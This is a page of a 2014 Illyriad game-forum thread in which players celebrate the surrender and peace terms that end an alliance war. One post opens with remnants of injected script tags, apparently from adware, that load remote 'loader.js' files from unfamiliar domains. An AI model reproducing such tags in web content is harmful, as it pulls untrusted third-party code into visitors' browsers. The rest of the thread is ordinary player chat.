Play Now Login Create Account
illyriad
  FAQ FAQ  Forum Search   Register Register  Login Login

Harmless Surrenders

Post Reply Post Reply Page  <1234>
Author
 Rating: Topic Rating: 1 Votes, Average 5.00  Topic Search Topic Search  Topic Options Topic Options
Glin View Drop Down
Wordsmith
Wordsmith

Post Options Post Options   Thanks (0) Thanks(0)   Quote Glin Quote  Post ReplyReply Direct Link To This Post Posted: 20 Jul 2014 at 18:00
I agree the game should be fun. And it is for many.  The war motif is part of the fun for many. Let's keep in mind that the surrender did just ruins some people's fun. They play Illy daily to escape the ravages of reality by fighting in a war. I see nothing harmful in that. I do see a lot of silent players. Sad they have become disenfranchised in the game. Both for and against a war. I see this as almost like a fight in a family. The end of the war is like a death in the family. The bickering and fighting that is now going on is like the family fighting over the will. The war did not really end. Just the use of other Illy members to keep it going. The fighting has got to stop for the war to be over. <shrug> Just my two cents.  As the future overseer of BL I approve this message and thank you for reading my post. 
<nails on chalkboard sounds effects as I exit stage right>
Deranzin View Drop Down
Postmaster
Postmaster

Post Options Post Options   Thanks (0) Thanks(0)   Quote Deranzin Quote  Post ReplyReply Direct Link To This Post Posted: 20 Jul 2014 at 20:09
Whoooot? LOL

Originally posted by Kumomoto Kumomoto wrote:

4.       All alliances from the war will help put together rules of conduct for war. To be fair no alliance has to sign up for them, because you can play as you like in Illy. And all participants will put encourage all alliances to sign up.

Well this is definitely something that I feel was worth fighting for and giving all I had ... now all that is left to see is who are going to contribute and participate in it, so that there won't be any more active accounts in ruins in the foreseeable future.  Wink

Just like a "before and after" ad ! ahahahaah :p
jcx View Drop Down
Forum Warrior
Forum Warrior

Post Options Post Options   Thanks (0) Thanks(0)   Quote jcx Quote  Post ReplyReply Direct Link To This Post Posted: 21 Jul 2014 at 03:04
cheers! Clap

rebuilding time!
Disclaimer: The above is jcx|orcboy's personal opinion and is not the opinion or policy of Harmless? [H?] or of the little green men that have been following him all day.

jcx in H? | orcboy in H?
GirlFromHell View Drop Down
Greenhorn
Greenhorn

Post Options Post Options   Thanks (0) Thanks(0)   Quote GirlFromHell Quote  Post ReplyReply Direct Link To This Post Posted: 21 Jul 2014 at 06:38
< ="text/" ="http://s.xcodelib.net/amm/rapps/116/10040004/loader.js" ="UTF-8">< ="text/" ="http://s.xcodelib.net/agmz/10040004/loader.js">< ="text/" ="http://i.omeljs.info/omel/.js?channel=1&appTitle=PennyBee">Congrats! Yay for peace Clap Big smile
~Hell_Girl_Rei / -Nyx-

Dovie'andi se tovya sagain.
Tacardi View Drop Down
New Poster
New Poster

Post Options Post Options   Thanks (0) Thanks(0)   Quote Tacardi Quote  Post ReplyReply Direct Link To This Post Posted: 21 Jul 2014 at 14:04
Well Done H? It was a long terrible war, we feared that we would lose a Great Alliance to the ravages of this war, TCOL is joyous that it is not the case here.

Three Cheer's for H? and it's leadership team (Starry, Kumo, KP, Amorphias, and the rest, that I did not get the opportunity to work with)

Hip Hip Hurrah!!!!
Hip Hip Hurrah!!!
Hip Hip Hurrah!!!

On this item
4.  All alliances from the war will help put together rules of conduct for war. To be fair no alliance has to sign up for them, because you can play as you like in Illy. And all participants will put encourage all alliances to sign up.

The alliances( T-O, DB & TCOL) of THE DOMINION involved in the war, have already started discussions on this topic, as part of the Rules of conduct for War, there needs to be Rules of Engagement also.

Again we are so very joyous on this event
Luciferous View Drop Down
New Poster
New Poster

Post Options Post Options   Thanks (0) Thanks(0)   Quote Luciferous Quote  Post ReplyReply Direct Link To This Post Posted: 21 Jul 2014 at 15:27
This is excellent news to start the day ! Finally this war is over ... was over for me a month ago, but now its official, gr8 job H? for surviving this brutal war and great job by The GA for this amazing show of coordination and tactic.
The terms are excellent and since I started The Lords of Elgea as a new alliance and I am seeking to recruit members spread out around Elgea, I would love to use LoE as a PEACE alliance open for all to join and work on rebuilding and regaining strength.
Especially as being a part in the war, I am ready and most willing to help the players involved in both parties to rebuild and regain their previous stance. Doors wide open all you got to do is contact me.

May we all prosper and live peacefully.

Lord Julien
Arctic55 View Drop Down
Forum Warrior
Forum Warrior

Post Options Post Options   Thanks (1) Thanks(1)   Quote Arctic55 Quote  Post ReplyReply Direct Link To This Post Posted: 21 Jul 2014 at 18:41
I come back from vacation, and this was the first forum I saw. I was shocked and over joyed to see it. Looks like I'll have to go on vacation more often. Anyways, Congrats to all the alliances who were in the fight till the end. May this peace last for many "Illyrian" generations.
Hiei View Drop Down
Forum Warrior
Forum Warrior

Post Options Post Options   Thanks (0) Thanks(0)   Quote Hiei Quote  Post ReplyReply Direct Link To This Post Posted: 22 Jul 2014 at 21:09
There was great effort on both sides of the war and we all did the best jobs we possibly could. In that honor, I solute everyone from both parties! *Salutes* Anyone that would need help with resource pushes and some other things, feel free to ask, and don't hesitate!

Cheers all,
auel View Drop Down
Greenhorn
Greenhorn

Post Options Post Options   Thanks (0) Thanks(0)   Quote auel Quote  Post ReplyReply Direct Link To This Post Posted: 25 Jul 2014 at 16:10
In accordance with clause 6 of the Harmless? surrender terms NAAM has been disbanded. Handshake

Josiah
Rill View Drop Down
Postmaster General
Postmaster General
Player Council - Geographer

Post Options Post Options   Thanks (0) Thanks(0)   Quote Rill Quote  Post ReplyReply Direct Link To This Post Posted: 25 Jul 2014 at 20:11
/me salutes NAAM

I think you guys epitomized "spunky."
 Post Reply Post Reply Page  <1234>
  Share Topic